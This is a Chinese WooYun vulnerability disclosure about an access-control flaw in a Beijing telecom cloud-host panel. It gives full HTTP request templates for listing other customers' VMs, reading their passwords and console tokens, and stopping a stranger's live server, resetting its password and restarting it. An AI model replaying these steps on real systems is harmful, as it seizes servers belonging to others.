当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150098

漏洞标题:北京电信通(时代宏远)云主机面板存在越权漏洞可导致越权控制大量服务器权限

相关厂商:电信通

漏洞作者: glzjin

提交时间:2015-10-28 15:12

修复时间:2015-12-13 17:22

公开时间:2015-12-13 17:22

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-28: 细节已通知厂商并且等待厂商处理中
2015-10-29: 厂商已经确认,细节仅向厂商公开
2015-11-08: 细节向核心白帽子及相关领域专家公开
2015-11-18: 细节向普通白帽子公开
2015-11-28: 细节向实习白帽子公开
2015-12-13: 细节向公众公开

简要描述:

看到这个标题是不是很熟悉呢?

详细说明:

是的,先看到这里
http://**.**.**.**/bugs/wooyun-2015-098853
在我今天早上发现了漏洞之后,就去网上搜索了一下,没想到还真的有过。
不过,既然已经公开了,那么应该已经修复了吧?
然而,我测试过程中,发现,还是没有,下面我就结合我的发现,来报告一下这个漏洞。
首先,是进入到这个管理面板。
http://**.**.**.**/index.asp
然后登陆,
开始抓包。

7DCB.tm.png


在登陆之后,可以看到抓到这样一个包,我们从这里入手

POST **.**.**.**:7001/drpengcloudportal/pr/client?p=/instance/describeInstances HTTP/1.1
Host: **.**.**.**:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:7001/drpengcloudportal/newui/jsp/workspace.jsp
Content-Length: 56
Cookie: JSESSIONID=A05*******************
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
type=1&state=&name=&beginDate=&endDate=&ownUserId=******


这个,最后面的 ownUserId 大有玄机,我们随机改改试试

POST **.**.**.**:7001/drpengcloudportal/pr/client?p=/instance/describeInstances HTTP/1.1
Host: **.**.**.**:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:7001/drpengcloudportal/newui/jsp/workspace.jsp
Content-Length: 56
Cookie: JSESSIONID=A05F8D414F3***********
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
type=1&state=&name=&beginDate=&endDate=&ownUserId=418600


然后我们看看返回了什么吧

{"data":[{"state":"running","msg":null,"config":{"monitorSate":null,"memorySize":512,"cpuNum":1},"instanceName":"i-2-22462-VM","nicsNum":1,"bizType":1,"optState":"","templateType":1,"expireDate":1448171004000,"instanceId":434522,"productCode":"XYI-win2003_32_N1","productName":"国内云主机MⅡ-win2003-32-N1","appName":null,"appDesc":null,"createDate":1445007880000,"saleDate":1445491672000,"instanceType":1,"resourcePoolId":"12f499f0-1861-4384-93b4-37fd18efdada"}],"code":"0","msg":"success"}


哈哈就得到这个账户的信息了。
然后我们这里需要的是 instanceId 这个参数 可以看到我们目标攻击的主机是 434522,记下。
然后我们继续看,先到自己的主机里,查看密码,抓到一个格式,作为模板。

POST **.**.**.**:7001/drpengcloudportal/pr/client?p=/instance/vm/searchPassword/****** HTTP/1.1
Host: **.**.**.**:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:7001/drpengcloudportal/newui/jsp/workspaceConsole.jsp
Cookie: JSESSIONID=A05F8D4************
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0


把 URL 里的地址 替换成 上面获取的实例ID,
比如 刚刚的,

POST **.**.**.**:7001/drpengcloudportal/pr/client?p=/instance/vm/searchPassword/434522 HTTP/1.1
Host: **.**.**.**:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:7001/drpengcloudportal/newui/jsp/workspaceConsole.jsp
Cookie: JSESSIONID=A05F8D41*******
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0


然后就可以看到了

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/json;charset=utf-8
Transfer-Encoding: chunked
Date: Wed, 28 Oct 2015 05:47:08 GMT
2f
{"data":"sC9fwrpzk","code":"0","msg":"success"}
0


然后继续来,获取一下远程桌面的连接地址吧。
同样的,点击自己的主机,抓个模板。

POST **.**.**.**:7001/drpengcloudportal/api HTTP/1.1
Host: **.**.**.**:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:7001/drpengcloudportal/newui/jsp/workspaceConsole.jsp
Content-Length: 70
Cookie: JSESSIONID=A05F8D414F3B************
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
command=getVirtualMachineVncContent&reponseType=json&instanceId=******


如法炮制,获取我们目标主机的 URL。

POST **.**.**.**:7001/drpengcloudportal/api HTTP/1.1
Host: **.**.**.**:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:7001/drpengcloudportal/newui/jsp/workspaceConsole.jsp
Content-Length: 70
Cookie: JSESSIONID=A05F8D414F3B************
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
command=getVirtualMachineVncContent&reponseType=json&instanceId=434522


获取到了~

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Content-Length: 331
Date: Wed, 28 Oct 2015 05:53:13 GMT
{"html":"http:\/\/**.**.**.**\/ajax?token=AjxGnsjX3lLTBSNVbxlIgomzZ6vFg44Z6ISHRrccoXJHOxgNiM7u8NI1bmcP_OT2Uw38McVMk51y_-0DMk09FE7dWam1ojWD7v1IN9-BlNXz7-k9Z80mbO81dHb-My_scv_tAzJNPRTwT0gI5KgWNl2tIQwVjgrLFyWl7E_-WslM2hgI56rYO-oPXqbWJJmm5hTQmmlVX-lJTTSOIBLfcnlCGsZKmYN1qIGKbT5b-JXfDaRfFuCMIZJlnppEufsM&guest=windows&title=i-2-22462-VM"}


我们访问看看~
http://**.**.**.**/ajax?token=AjxGnsjX3lLTBSNVbxlIgomzZ6vFg44Z6ISHRrccoXJHOxgNiM7u8NI1bmcP_OT2Uw38McVMk51y_-0DMk09FE7dWam1ojWD7v1IN9-BlNXz7-k9Z80mbO81dHb-My_scv_tAzJNPRTwT0gI5KgWNl2tIQwVjgrLFyWl7E_-WslM2hgI56rYO-oPXqbWJJmm5hTQmmlVX-lJTTSOIBLfcnlCGsZKmYN1qIGKbT5b-JXfDaRfFuCMIZJlnppEufsM&guest=windows&title=i-2-22462-VM
看到没,登陆了。

E18.tm.png


我用刚才得到的密码 sC9fwrpzk 试试。

1033.tm.png


似乎是修改了默认密码
不要紧,我们可以重置
在自己的面板上,先关机,然后尝试重置密码,这里我抓模板。
这个是关机的

POST **.**.**.**:7001/drpengcloudportal/pr/client?p=/instance/vm/stopInstances/****** HTTP/1.1
Host: **.**.**.**:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:7001/drpengcloudportal/newui/jsp/workspaceConsole.jsp
Cookie: JSESSIONID=A05F8D*********
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0


这个是重置密码的

POST **.**.**.**:7001/drpengcloudportal/pr/client?p=/instance/vm/resetPassword HTTP/1.1
Host: **.**.**.**:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:7001/drpengcloudportal/newui/jsp/workspaceConsole.jsp
Content-Length: 28
Cookie: JSESSIONID=*****************
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
ids=******&newOsPwd=testhack


然后这个是开机指令。

POST **.**.**.**:7001/drpengcloudportal/pr/client?p=/instance/vm/startInstances/****** HTTP/1.1
Host: **.**.**.**:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:7001/drpengcloudportal/newui/jsp/workspaceConsole.jsp
Cookie: JSESSIONID=A05F8D*********
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0


OK ,我们来试试
发送停机指令

POST **.**.**.**:7001/drpengcloudportal/pr/client?p=/instance/vm/stopInstances/434522 HTTP/1.1
Host: **.**.**.**:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:7001/drpengcloudportal/newui/jsp/workspaceConsole.jsp
Cookie: JSESSIONID=A05F8D414F**********
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0


filehelper_1446014596247_22.png


然后继续

POST **.**.**.**:7001/drpengcloudportal/pr/client?p=/instance/vm/resetPassword HTTP/1.1
Host: **.**.**.**:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:7001/drpengcloudportal/newui/jsp/workspaceConsole.jsp
Content-Length: 28
Cookie: JSESSIONID=A05F8D414F*********
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
ids=434522&newOsPwd=testhack


重置密码了
然后启动看看

POST **.**.**.**:7001/drpengcloudportal/pr/client?p=/instance/vm/startInstances/434522 HTTP/1.1
Host: **.**.**.**:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:7001/drpengcloudportal/newui/jsp/workspaceConsole.jsp
Cookie: JSESSIONID=**********
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0


看看能登陆没= =

POST **.**.**.**:7001/drpengcloudportal/api HTTP/1.1
Host: **.**.**.**:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:7001/drpengcloudportal/newui/jsp/workspaceConsole.jsp
Content-Length: 70
Cookie: JSESSIONID=*****************
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
command=getVirtualMachineVncContent&reponseType=json&instanceId=434522


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Content-Length: 331
Date: Wed, 28 Oct 2015 06:38:06 GMT
{"html":"http:\/\/**.**.**.**\/ajax?token=AjxGnsjX3lLTBSNVbxlIgomzZ6vFg44Z6ISHRrccoXJHOxgNiM7u8NI1bmcP_OT2hKQKK_Co0p1y_-0DMk09FE7dWam1ojWD7v1IN9-BlNXz7-k9Z80mbO81dHb-My_scv_tAzJNPRTwT0gI5KgWNl2tIQwVjgrLFyWl7E_-WslM2hgI56rYO-oPXqbWJJmm5hTQmmlVX-kvWZef6ESo25qF7mRQUFT8L46G0pqyAjG_mI4pwlMGLpBsBD40gtIw&guest=windows&title=i-2-22462-VM"}


然后,接着看下面的验证。

漏洞证明:

913256825@chatroom_1446015444560_45.png


LInux 的我就不演示了,异曲同工
要是我写个小脚本来批量重装系统= =不晓得有什么后果呢。

修复方案:

加强验证

版权声明:转载请注明来源 glzjin@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-29 17:21

厂商回复:

CNVD确认所述情况,已经由CNVD通过网站公开联系方式向软件生产厂商通报。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-10-28 17:27 | DNS ( 普通白帽子 | Rank:543 漏洞数:61 | 没有我,你们就去背IP吧)

    1

  2. 2015-10-29 23:59 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1077 漏洞数:139 | 多乌云、多机会!微信公众号: id:a301zls ...)

    好熟悉的标题